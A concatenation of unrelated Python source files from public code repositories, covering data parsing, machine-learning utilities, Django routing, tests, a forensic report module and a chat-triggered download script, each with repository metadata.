parser.add_argument("-fn", '--fxoutname', help="Average_BuildModel_<pdbfilename>.fxout")
parser.add_argument("-c", '--cutoff',help="Cutoff of ddg")
args = parser.parse_args()
fxoutname = args.fxoutname
subnum = int(args.subdirnum)
cutoff = int(args.cutoff)
df_average_lst = []
for num in range(subnum):
num += 1
fxout_name = "Subdirectory"+str(num)+"/"+fxoutname
df_average = pd.read_table(fxout_name, sep='\t',skiprows=8)
df_average_lst.append(df_average)
df_list_lst = []
for num in range(subnum):
num += 1
list_name = "test/Subdirectory"+str(num)+"/List_Mutations_readable.txt"
df_list = pd.read_table(list_name, sep=" ",header=None)
df_list_lst.append(df_list)
df_average_all = pd.concat(df_average_lst, axis=0, ignore_index=True)
#df_average.head()
df_list_all = pd.concat(df_list_lst, axis=0, ignore_index=True)
df_o = df_average_all.iloc[:, 0:3].join(df_list_all)
odict = {'mutation':[],'energy':[],'SD':[],'position':[]}
for i in range(df_o.shape[0]):
odict['mutation'].append(str(df_o[1][i])+str(df_o[2][i])+str(df_o[3][i]))
odict['position'].append(str(df_o[2][i]))
odict['energy'].append(df_o['total energy'][i])
odict['SD'].append(df_o['SD'][i])
CompleteList_df = pd.DataFrame(odict)
CompleteList_SortedByEnergy_df = CompleteList_df.sort_values('energy').reset_index(drop=True)
def BestPerPosition(df):
position_list = []
length = df.shape[0]
for i in range(length):
if df['position'][i] in position_list:
df = df.drop(index=i)
else:
position_list.append(df['position'][i])
return df.reset_index(drop=True)
def BelowCutOff(df,cutoff):
#position_list = []
length = df.shape[0]
for i in range(length):
if float(df['energy'][i]) > float(cutoff):
df = df.drop(index=i)
else:
continue
return df.reset_index(drop=True)
BestPerPosition_SortedByEnergy_df = BestPerPosition(CompleteList_SortedByEnergy_df)
BestPerPosition_df = BestPerPosition(CompleteList_SortedByEnergy_df)
BelowCutOff_df = BelowCutOff(CompleteList_df,-1)
BelowCutOff_SortedByEnergy_df = BelowCutOff(CompleteList_SortedByEnergy_df,-1)
BestPerPositionBelowCutOff_SortedByEnergy_df = BelowCutOff(BestPerPosition_SortedByEnergy_df,-1)
BestPerPositionBelowCutOff_df = BelowCutOff(BestPerPosition_df,-1)
def variablename(var):
import itertools
return [tpl[0] for tpl in filter(lambda x: var is x[1], globals().items())]
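# variablename() recovers a DataFrame's global variable name by identity lookup in globals();
# out_tab_file() uses it to build the output file name, e.g. BelowCutOff_df -> "MutationsEnergies_BelowCutOff.tab".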
def out_tab_file(df):
df_name = variablename(df)[0]
filename = "MutationsEnergies_"+df_name[:-3]+".tab"
with open(filename,"w+") as of:
        of.write(df.to_csv(columns=['mutation', 'energy', 'SD'], sep='\t', index=False))
of.close()
out_tab_file(CompleteList_df)
out_tab_file(CompleteList_SortedByEnergy_df)
out_tab_file(BestPerPosition_SortedByEnergy_df)
out_tab_file(BestPerPosition_df)
out_tab_file(BelowCutOff_df)
out_tab_file(BelowCutOff_SortedByEnergy_df)
out_tab_file(BestPerPositionBelowCutOff_SortedByEnergy_df)
out_tab_file(BestPerPositionBelowCutOff_df)
| 3,403 |
utils/fasttext_utils.py | samujjwaal/multilingual-chatbot | 0 | 2169248 |
# import libraries
import wget
import os
import fasttext
fasttext.FastText.eprint = lambda x: None
url = [
# 917kB, compressed version of the model
"https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.ftz",
# 126MB, faster and slightly more accurate
"https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.bin",
]
model_names = list(map(lambda u: u.split("/")[-1], url))
# check whether a model is downloaded locally
def check_model_exist(option, path="models"):
os.makedirs(path, exist_ok=True)
    if model_names[option] not in os.listdir(path):
return False
else:
return True
# to download fasttext model locally
def download_model(option=0, path="models"):
if not check_model_exist(option):
wget.download(url[option], out=path)
# to load fasttext model from directory
def load_pretrained_model(option=0, path="models"):
download_model(option)
PRETRAINED_MODEL_PATH = f"{path}/{model_names[option]}"
lang_model = fasttext.load_model(PRETRAINED_MODEL_PATH)
return lang_model
# predict language of input text using fasttext
def predict_lang(prompt, option=0):
model = load_pretrained_model(option)
lang = model.predict(prompt)[0][0].split("__")[2]
return lang
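# Minimal usage sketch (assumes the lid.176 model can be downloaded into ./models):
#   predict_lang("Bonjour tout le monde")            # expected to return "fr"
#   predict_lang("This is English text", option=1)   # uses the larger .bin model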
| 1,328 |
equipmentdb/urls.py | Jongmassey/ubuc-dev | 0 | 2170696 |
from django.urls import path
from django.views.generic import TemplateView
import inspect
from equipmentdb.model_base import classToURL
from equipmentdb.views import (
UbucBaseListView,
UbucBaseCreateView,
UbucBaseUpdateView,
index,
)
from . import views
def generatePath(view_class):
model_url = classToURL(view_class.model.__name__)
if UbucBaseListView in view_class.__bases__:
return path(model_url, view_class.as_view(), name=f"{model_url}-list")
if UbucBaseCreateView in view_class.__bases__:
return path(
f"{model_url}/add", view_class.as_view(), name=f"{model_url}-add"
)
if UbucBaseUpdateView in view_class.__bases__:
return path(
f"{model_url}/<int:pk>",
view_class.as_view(),
name=f"{model_url}-update",
)
if UbucBaseUpdateView in view_class.__bases__:
return path(
f"{model_url}/<int:pk>/delete",
view_class.as_view(),
name=f"{model_url}-delete",
)
urlpatterns = [
path("", index, name="index"),
path("about/", TemplateView.as_view(template_name="about.html")),
]
urlpatterns += [
generatePath(view_class)
for n, view_class in inspect.getmembers(views, inspect.isclass)
if "model" in view_class.__dict__
and view_class.__bases__[0]
in [
UbucBaseListView,
UbucBaseCreateView,
UbucBaseUpdateView,
UbucBaseUpdateView,
]
]
| 1,476 |
Scripts/dataset.py | tasnim7ahmed/Multi-Class-Multi-Label-Text-Classification-Using-BERT | 0 | 2169650 |
import torch
import pandas as pd
from transformers import BertTokenizer
import numpy as np
from common import get_parser
parser = get_parser()
args = parser.parse_args()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
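# format_label() parses a stored label string such as "[1. 0. 0. 1.]" (the example format is
# an assumption) into a list of ints by stripping brackets and dots and splitting on spaces.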
def format_label(label):
label = (str(label))
label = label[1:len(label)-2]
for char in label:
label = label.replace(".","")
return list(map(int, label.split(" ")))
class Dataset:
def __init__(self, text, target):
self.text = text
self.tokenizer = BertTokenizer.from_pretrained(args.pretrained_tokenizer_name)
self.max_length = args.max_length
self.target = target
def __len__(self):
return len(self.text)
def __getitem__(self, item):
text = str(self.text[item])
text = "".join(text.split())
inputs = self.tokenizer.encode_plus(
text = text,
padding = "max_length",
truncation = True,
max_length = self.max_length
)
input_ids = inputs["input_ids"]
token_type_ids = inputs["token_type_ids"]
attention_mask = inputs["attention_mask"]
return{
"input_ids":torch.tensor(input_ids,dtype = torch.long),
"attention_mask":torch.tensor(attention_mask, dtype = torch.long),
"token_type_ids":torch.tensor(token_type_ids, dtype = torch.long),
"target":torch.tensor(format_label(self.target[item]), dtype = torch.long)
}
def generate_dsfile(path):
df = pd.read_csv(path).dropna()
Label_Columns = df.columns.tolist()[3::2]
print(len(Label_Columns))
print(df[Label_Columns].sum().sort_values())
categorized_comment = df[df[Label_Columns].sum(axis=1) > 0]
uncategorized_comment = df[df[Label_Columns].sum(axis=1) == 0]
print(f'Categorized - {len(categorized_comment)}, Uncategorized - {len(uncategorized_comment)}')
comments = []
labels = []
for i in range(0,len(df.comment.values)):
current_comment = df.comment.values[i]
current_label = df[Label_Columns].values[i]
comments.append(current_comment)
labels.append(current_label)
sample_count = [0,0,0,0,0,0,0,0]
for label in labels:
for i in range(0,len(label)):
if(label[i]==1):
sample_count[i]+=1
print(sample_count)
ds_data = pd.DataFrame()
ds_data["comment"] = comments
ds_data["label"] = labels
ds_data.to_csv("../Dataset/mod.csv")
del ds_data
if __name__=="__main__":
#generate_dsfile("../Dataset/train.csv")
if(args.augmentation=="True"):
data_dir = args.aug_train_file
else:
data_dir = args.train_file
df = pd.read_csv(data_dir).dropna()
print(df.head())
dataset = Dataset(text=df.comment.values, target=df.label.values)
print(dataset[0])
| 2,902 |
lib/python/flame/optimizer/fedopt.py | GaoxiangLuo/flame | 6 | 2168968 |
# Copyright 2022 Cisco Systems, Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
"""FedOPT optimizer"""
"""https://arxiv.org/abs/2003.00295"""
from abc import abstractmethod
import logging
from diskcache import Cache
from .fedavg import FedAvg
from ..common.util import (MLFramework, get_ml_framework_in_use,
valid_frameworks)
from collections import OrderedDict
logger = logging.getLogger(__name__)
class FedOPT(FedAvg):
"""FedOPT class."""
def __init__(self, beta_1, beta_2, eta, tau):
"""Initialize FedOPT instance."""
super().__init__()
self.current_weights = None
self.d_t = None
self.m_t = None
self.v_t = None
self.beta_1 = beta_1
self.beta_2 = beta_2
self.eta = eta
self.tau = tau
ml_framework_in_use = get_ml_framework_in_use()
if ml_framework_in_use == MLFramework.PYTORCH:
self.adapt_fn = self._adapt_pytorch
elif ml_framework_in_use == MLFramework.TENSORFLOW:
            self.adapt_fn = self._adapt_tensorflow
else:
raise NotImplementedError(
"supported ml framework not found; "
f"supported frameworks are: {valid_frameworks}")
def do(self, cache: Cache, total: int):
"""Do aggregates models of trainers.
Return: aggregated model
"""
logger.debug("calling fedopt")
self.agg_weights = super().do(cache, total)
if self.agg_weights is None:
return self.current_weights
if self.current_weights is None:
self.current_weights = self.agg_weights
else:
self.adapt_fn(self.agg_weights, self.current_weights)
return self.current_weights
@abstractmethod
def _delta_v_pytorch(self):
return
@abstractmethod
def _delta_v_tensorflow(self):
return
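    # Server-side adaptive update from the FedOpt paper: given the aggregated delta d_t,
    # m_t = beta_1 * m_{t-1} + (1 - beta_1) * d_t, v_t is updated by the subclass-specific
    # _delta_v_* hook (Adagrad/Adam/Yogi variants), and the new weights are
    # x_{t+1} = x_t + eta * m_t / (sqrt(v_t) + tau).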
def _adapt_pytorch(self, average, current):
import torch
logger.debug("calling _adapt_pytorch")
self.d_t = {k: average[k] - current[k] for k in average.keys()}
if self.m_t is None:
self.m_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()}
self.m_t = {k: self.beta_1 * self.m_t[k] + (1 - self.beta_1) * self.d_t[k] for k in self.m_t.keys()}
if self.v_t is None:
self.v_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()}
self._delta_v_pytorch()
self.current_weights = OrderedDict({k: self.current_weights[k] + self.eta * self.m_t[k] / (torch.sqrt(self.v_t[k]) + self.tau) for k in self.current_weights.keys()})
    def _adapt_tensorflow(self, average, current):
logger.debug("calling _adapt_tensorflow")
# TODO: Implement Tensorflow Version
raise NotImplementedError("Tensorflow implementation not yet implemented")
| 3,432 |
src/server/app/main/models/SignUpContestModel.py | vetrivelcsamy/execode | 0 | 2169257 |
from .. import db
import datetime
class SignUpContestModel(db.Model):
__tablename__ = 'signup_contest'
id = db.Column(db.Integer, primary_key=True)
    created_at = db.Column(db.DateTime(timezone=True),
                           # pass the callable so the timestamp is evaluated per insert,
                           # not once at import time
                           nullable=False, default=datetime.datetime.now)
contest_id = db.Column(db.Integer, db.ForeignKey(
'contests.id'), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey(
'users.id'), nullable=False)
| 471 |
tests/test_cli/test_cli_exceptions.py | charles-l/pyinfra | 1,532 | 2170819 |
from unittest import TestCase
from click.testing import CliRunner
from pyinfra_cli.exceptions import CliError
from pyinfra_cli.main import cli
class TestCliExceptions(TestCase):
@classmethod
def setUpClass(cls):
cls.test_cli = CliRunner()
cls.old_cli_show = CliError.show
@classmethod
def tearDownClass(cls):
CliError.show = cls.old_cli_show
def setUp(self):
self.exception = None
CliError.show = lambda e: self.capture_cli_error(e)
def capture_cli_error(self, e):
self.exception = e
self.old_cli_show()
def assert_cli_exception(self, args, message):
self.test_cli.invoke(cli, args)
self.assertIsInstance(self.exception, CliError)
assert self.exception.message == message
def test_bad_deploy_file(self):
self.assert_cli_exception(
['my-server.net', 'nop.py'],
'No deploy file: nop.py',
)
def test_bad_fact(self):
self.assert_cli_exception(
['my-server.net', 'fact', 'thing'],
'No fact: thing',
)
| 1,103 |
backend/ml/detector.py | ucinlp/covid19-backend | 6 | 2168840 |
"""
Abstract base class for misconception detectors
"""
from typing import Any, Dict, List, Union
import numpy as np
from backend.ml.misconception import MisconceptionDataset
# TODO: @rloganiv - The detector/misconception interaction would be better handled by using the
# observer design pattern to update the misconception encodings whenever the misconception dataset
# issues a notification that it has been updated. The issue with the current approach is that it
# may cache redundant data.
class Detector:
"""
Abstract base class for a misconception detector.
"""
def __init__(self):
self._cache: Dict[str, Any] = {}
def _encode(self, sentences: List[str]):
raise NotImplementedError
def _predict(self, scores: np.ndarray) -> List[List[int]]:
raise NotImplementedError
def predict(self,
sentence: str,
misconceptions: MisconceptionDataset) -> Dict[str, Any]:
"""
Predicts whether a given piece of text corresponds to a misconception.
# Parameters
sentences : str or List[str]
The text to score. Can either be a string or a list of strings.
misconceptions : MisconceptionDataset
The misconceptions to score against.
# Returns
output : Dict[str, Any]
A dictionary of the prediction results. Will be serialized to JSON.
"""
# TODO: @rloganiv - Current implementation works on a single sentence since that is the
# expected input from the frontend. For evaluation purposes it probably makes sense to
        # allow predictions on batches of instances as well...maybe as a separate method so output
# type is consistent.
scores = self.score(sentence, misconceptions)
predictions = self._predict(scores)[0]
# TODO: Relevance prediction
readable_predictions = []
for idx in predictions:
score = scores[0, idx]
misconception = misconceptions[idx]
readable_predictions.append({
'misinformation_score': float(score),
'misinformation': misconception,
})
output_dict = {
'input': sentence,
'relevant': True,
'predictions': readable_predictions,
}
return output_dict
def _score(self, sentences, misconceptions) -> np.ndarray:
raise NotImplementedError
def score(self,
sentences: Union[str, List[str]],
misconceptions: MisconceptionDataset) -> np.ndarray:
"""
Scores whether or not a given piece of text corresponds to a misconception.
# Parameters
sentences : str or List[str]
The text to score. Can either be a string or a list of strings.
misconceptions : MisconceptionDataset
The misconceptions to score against.
# Returns
scores : np.ndarray
An array with shape (num_sentences, num_misconceptions) containing the scores.
"""
# encode misconceptions and cache to avoid needless recomputation.
if misconceptions not in self._cache:
self._cache[misconceptions] = self._encode(misconceptions.sentences)
encoded_misconceptions = self._cache[misconceptions]
if isinstance(sentences, str):
sentences = [sentences]
encoded_sentences = self._encode(sentences)
scores = self._score(encoded_sentences, encoded_misconceptions)
return scores
def refresh_cache(self) -> None:
"""
Refresh (clear) the misconception cache.
"""
self._cache = {}
| 3,691 |
codes/run_yelp.py | BGT-M/AugSplicing | 1 | 2170342 |
from codes.invoke import optimiAlgo
if __name__ == '__main__':
'yelp data'
inputfile = '../data/yelp/input.tensor'
outpath = '../output/yelp/AugSplicing'
s = 30 # time stride(day)
maxSp = 30 # the maximum splicing number at each epoch
delimeter, N = ',', 3 # the delimeter/dimension of input data
steps = 30 # the number of time steps
k, l = 10, 5 # the number of top blocks we find/ slack constant
optimiAlgo(inputfile, outpath, s, k, l, maxSp, N, delimeter, steps=30)
| 513 |
logic/src/libs/multiple_async_requests.py | alexgreendev/UserDataBase | 0 | 2166734 |
import asyncio
# import json
# import time
from aiohttp import ClientSession, client_exceptions
from asyncio import Semaphore, ensure_future, gather, run
# from merge_lists import merge_lists
# noinspection PyUnresolvedReferences
class MultipleAsyncRequests:
def __new__(cls):
cls.urls = []
        cls.semaphore = Semaphore(10)
cls.http_ok = []
return cls
@classmethod
def add_url(cls, url):
cls.urls.append(url)
return cls
@classmethod
def add_status_ok(cls, http_ok):
cls.http_ok.append(http_ok)
return cls
@classmethod
def set_connection_limit(cls, limit):
asyncio.set_event_loop(asyncio.new_event_loop())
cls.semaphore = Semaphore(limit)
return cls
@classmethod
def request(cls) -> list:
return run(cls.__scrape())
@classmethod
async def __scrape(cls):
tasks = list()
async with ClientSession() as session:
for url in cls.urls:
task = ensure_future(cls.__scrape_bounded(url, cls.semaphore, session))
tasks.append(task)
result = await gather(*tasks)
return result
@classmethod
async def __scrape_bounded(cls, url, sem, session):
async with sem:
return await cls.__scrape_one(url, session)
@classmethod
async def __scrape_one(cls, url, session):
try:
async with session.get(url) as response:
content = await response.read()
except client_exceptions.ClientConnectorError:
return None
if response.status not in cls.http_ok:
return None
return content
# if __name__ == '__main__':
# iter = 1000
# while iter:
# res = MultipleAsyncRequests(). \
# add_url('http://localhost:7000/remote-servers/one.json'). \
# add_url('http://localhost:7000/remote-servers/two.json'). \
# add_url('http://localhost:7000/remote-servers/three.json'). \
# add_status_ok(200). \
# set_connection_limit(1000). \
# request()
# users_arrs = [json.loads(arr.decode()) for arr in res]
# users = merge_lists(users_arrs)
# print(sorted(users, key=lambda i: i['id']))
# print(len(users))
# iter -= 1
| 2,333 |
scripts/artifacts/snapchatMemimg.py | f0r3ns1cat0r/RLEAPP | 0 | 2169669 |
import os
import datetime
import csv
import calendar
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, media_to_html, kmlgen
def monthletter(month):
monthdict = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12'}
return monthdict[month]
def get_snapchatMemimg(files_found, report_folder, seeker, wrap_text):
userlist = []
start_terms = ('memories','custom_sticker')
for file_found in files_found:
file_found = str(file_found)
filename = os.path.basename(file_found)
one = (os.path.split(file_found))
username = (os.path.basename(one[0]).split('-')[0])
if username not in userlist:
userlist.append(username)
#print(userlist)
for name in userlist:
data_list_media = []
for file_found in files_found:
file_found = str(file_found)
filename = os.path.basename(file_found)
if filename.startswith(start_terms):
metadata = filename.split('~')
if name == metadata[3]:
typeoffile = metadata[0]
timestamp = metadata[2]
timestamp = timestamp.split('-')
org_string = timestamp[5]
mod_string = org_string[:-3]
timestamp = f'{timestamp[0]}-{timestamp[1]}-{timestamp[2]} {timestamp[3]}:{timestamp[4]}:{mod_string}'
usernamefile = metadata[3]
media = media_to_html(file_found, files_found, report_folder)
file_found_dir = os.path.dirname(file_found)
data_list_media.append((timestamp,media,filename,usernamefile,typeoffile,))
if data_list_media:
report = ArtifactHtmlReport(f'Snapchat - Memories')
report.start_artifact_report(report_folder, f'Snapchat - Memories - {name}')
report.add_script()
data_headers = ('Timestamp','Media','Filename','User','File Type')
report.write_artifact_data_table(data_headers, data_list_media, file_found_dir, html_no_escape=['Media'])
report.end_artifact_report()
tsvname = f'Snapchat - Memories - {name}'
tsv(report_folder, data_headers, data_list_media, tsvname)
tlactivity = f'Snapchat - Memories- {name}'
timeline(report_folder, tlactivity, data_list_media, data_headers)
else:
logfunc(f'No Snapchat - Memories - {name}')
| 2,732 |
user.py | Chris-karanja/Password-Locker | 0 | 2169959 |
from credentials import Credentials
class User:
"""Class Generates new instances of Users"""
Users = [] #list of users
username = ''
email = ''
password = ''
def __init__(self, username, email, password):
self.username = username
self.email = email
self.password = password
def add_user(self):
"""save_contact method saves contact objects into contact_list"""
User.Users.append(self)
@classmethod
def find_user(cls,persona,secret):
'''
Method that takes in a persona and returns a user that matches that persona.
Args:
persona: Person to search for
Returns :
details of person that matches the persona.
'''
for saved_user in cls.Users:
if saved_user.username == persona and saved_user.password == secret:
return saved_user
@classmethod
def user_exist(cls,persona):
'''
Method that checks if a user exists from the user list.
Args:
persona: username to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for person in cls.Users:
if person.username == persona:
return True
return False
@classmethod
def display_users(cls):
'''
method that returns the user list
'''
return cls.Users
| 1,972 |
bin/pannzer/operators/naive.py | nestorzaburannyi/annotate | 1 | 2170621 |
import sys
from myoperator import BlockOperator
# Clone a rowwise operator. Class name and file name (operators/classname.py) must be identical.
class naive(BlockOperator) :
"""Naive predictor as in CAFA: p(goid) is its base frequency in GOA. Input: qpid list"""
def __init__(self,glob):
self.glob=glob
# define nicknames for column indices
[self.data,self.prediction_data]=self.glob.use_sheets(["data","prediction"])
[self.qpid_col]=self.data.use_columns(["qpid"])
self.prediction_data.use_columns(["qpid","goid","frequency","ontology","description"])
# use online dictionary. Object handles in glob are hardcoded
self.glob.use_online_dictionaries(['GOIDELIC']) # downloads copy in Runner
self.pred=None
def process(self,block):
try:
row=block[0]
except:
return # empty block
if not self.pred: self.pred=self.naive() # load base frequencies
qpid=row[self.qpid_col] # input protein identifier
# multiply predictions for each qpid
for x in self.pred:
datarow=[qpid] + x
self.prediction_data.append_row(datarow)
def naive(self):
"base frequencies of GO terms, truncated to 2 decimals"
pred=[] # tuples (goid,freq)
for goid in self.glob.GOcounts.keys():
ontology=self.glob.ontology[goid]
rootcount=self.glob.rootcount[ontology]
if rootcount<1: continue
count=self.glob.GOcounts[goid]
freq=float(count)/rootcount
if freq >= 0.01: pred.append( [goid, "%.2f" %freq, ontology, self.glob.godesc[goid] ] )
return(pred)
| 1,733 |
shelter/migrations/0004_auto_20200718_1403.py | kermox/schronisko-krakow | 1 | 2170433 |
# Generated by Django 3.0.5 on 2020-07-18 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shelter', '0003_auto_20200717_1605'),
]
operations = [
migrations.AlterField(
model_name='animal',
name='additional_information',
field=models.TextField(blank=True, default='', verbose_name='dodatkowe informacje'),
),
]
| 448 |
msg.py | AshrafAkon/download_link_from_facebook_message | 0 | 2170808 |
from fbchat import Client
from fbchat.models import *
import xmlrpc.client as rpc
import requests
import time
import urllib.parse
import random
from settigs import group_id, email_id, id_password, file_path, log_file, rpc_url, key
from settings import who_sent
#################
#global_variables
new_msg = []
old_msg = []
unique_req = []
allowed_arg = ['link', 'torrent', 'meta']
grp_chat_id = group_id
i = 1
####end
with open(file_path, "w") as f:
file.read()
with open(log_file, "w") as f:
file.read()
def start_down(file_type, data, author):
if file_type == 'link' or file_type == 'meta':
gid = server.aria2.addUri(key,[data])
name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1]
confirmed_text = f"Your download has started with the file name {name}"
client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER)
down_started = f"download started from {who_sent(author)} with the file name {name}"
with open(log_file, 'a') as log:
log.write(down_started)
print(down_started)
elif file_type == 'torrent':
url = urllib.parse.unquote(data).split("php?u=")[1]
fil = requests.get(url).content
#print(fil)
gid = server.aria2.addTorrent(key, rpc.Binary(fil))
name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1]
confirmed_text = f"You download has started with the file name {name}"
client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER)
down_started = f"download started from {who_sent(author)} with the file name {name}"
with open(log_file, 'a') as log:
log.write(down_started)
print(down_started)
else:
print("not a valid data type")
def torrent_file(message): #a message object will be supplied and it will return the url of the file
attachment = message.attachments[0]
if isinstance(attachment, FileAttachment): #check if its file
url = attachment.url #fetching the url
file_name = attachment.name
return url, file_name
"""this function bellow(split_uid_msg) receives a message object and then return a list in this format [uid, [file_type, link or torrent_file_url]] """
def split_uid_msg(message):
uid = message.uid
text_msg = message.text.split(' ')
#file_type, text_msg = message.text.split(' ')
if len(text_msg) == 2 or message.attachments:
if len(text_msg) == 1 and len(message.attachments) == 1:
link, name = torrent_file(message)
print(name)
return [uid, 'torrent' , link, message.author]
else:
#file_type, text_msg = message.text.split(' ')
print(text_msg[0])
return [uid, text_msg[0], text_msg[1], message.author]
else:
pass
def unique_requests(list1):
#list1 = new list of data fetched from messages, list2 = old data
simple_list = []
final_list = []
list2 = []
with open(file_path, 'r') as f:
x = f.read()
y = x.split('&&&7_7&&&')
y.pop()
for z in y:
list2.append(z.split('%%%5_5%%%'))
if len(list2) > 0:
for curr in list2:
simple_list.append(curr[0])
for i in list1:
if i[0] in simple_list:
pass
else:
final_list.append(i)
if len(final_list) > 0:
with open(file_path, 'a') as f:
for i in final_list:
for n in i:
f.write(n)
f.write('%%%5_5%%%')
f.write('&&&7_7&&&')
return final_list
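# --- Illustrative sketch (not part of the original script) ------------------
# How a request is laid out in file_path by unique_requests() above: every
# field is followed by the field separator '%%%5_5%%%' and every record is
# terminated with '&&&7_7&&&'. The helper below is only a demonstration.
def _serialize_request(req):
    "req is [uid, file_type, data, author], as produced by split_uid_msg()."
    return "".join(str(field) + "%%%5_5%%%" for field in req) + "&&&7_7&&&"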
# logging in to the user account
client = Client(email_id, id_password)
while True:
print(f"\n\n\n\n\n\n\nnew session. session number {i}")
last_ten_msg = client.fetchThreadMessages(thread_id=grp_chat_id, limit=10)
if len(last_ten_msg) > 0:
print("new req")
for current_msg in last_ten_msg: #storing the messages in a organized way
            if current_msg.text is None:
pass
elif current_msg.attachments:
new_msg.append(split_uid_msg(current_msg))
elif split_uid_msg(current_msg) == None:
pass
else:
new_msg.append(split_uid_msg(current_msg))
print("\n\n\n")
print(f"new msg = {new_msg}")
unique_req = unique_requests(new_msg)
print(f"unique req = {unique_req}")
if len(unique_req) > 0:
for download in unique_req:
print(download[1], download[2], download[3])
start_down(download[1], download[2], download[3])
#old_msg = []
#old_msg = unique_req
else:
print(f"nothing to download on session {i}")
#if len(unique_re
#old_msg = []
#old_msg = unique_req
last_ten_msg = []
new_msg = []
unique_req = []
print(f"{i} session finished")
time.sleep(90)
else:
time.sleep(60)
i += 1
| 5,387 |
test_output.py
|
varshashivhare/Mastering-Python
| 30 |
2169925
|
import os
import time
import glob
import pytest
@pytest.mark.parametrize('output_filename', glob.iglob('*/*.out'))
def test_output(xprocess, output_filename):
output_filename = os.path.abspath(output_filename)
    name, ext = os.path.splitext(output_filename)
    def prepare(cwd):
        return '', ['python3', name + '.py']
pid, log_file = xprocess.ensure(output_filename, prepare)
while xprocess.getinfo(output_filename).isrunning():
time.sleep(0.01)
with open(output_filename) as output_file:
assert output_file.read() == log_file.read()
| 582 |
etl/parsers/etw/Microsoft_Windows_CertificateServicesClient_CredentialRoaming.py
|
IMULMUL/etl-parser
| 104 |
2170918
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-CertificateServicesClient-CredentialRoaming
GUID : 89a2278b-c662-4aff-a06c-46ad3f220bca
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1001, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1001_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1002, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1002_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1003, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1003_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1004, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1004_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1005, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1005_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1006, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1006_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1007, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1007_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1010, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1010_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
@declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1012, version=0)
class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1012_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"ErrorMsg" / WString
)
| 2,680 |
graphility/database_gevent.py
|
Gromobrody/codernitydb3
| 1 |
2169915
|
from graphility.database_safe_shared import SafeDatabase
from graphility.env import cdb_environment
try:
from gevent.lock import RLock
except ImportError:
raise NotImplementedError
cdb_environment["mode"] = "gevent"
cdb_environment["rlock_obj"] = RLock
class GeventDatabase(SafeDatabase):
pass
| 310 |
parse_xml_folder.py
|
tbj128/philips-ecg-parser
| 1 |
2168779
|
"""
Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array
Usage: python parse_xml_folder.py -i <input ECG XML folder> -o <output CSV> -n <output 12-lead ECG waveforms> -m <output ECG image folder>
Example: python parse_xml_folder.py -i ecgs -o output.csv -n output.npy -m ecg-imgs
"""
import os
import csv
import numpy as np
from philips import parse
from concurrent import futures
from tqdm import tqdm
import argparse
from pathlib import Path
import ecg_plot
#
# Main Code
#
def call_parse(args):
filename, path, output_image_folder = args
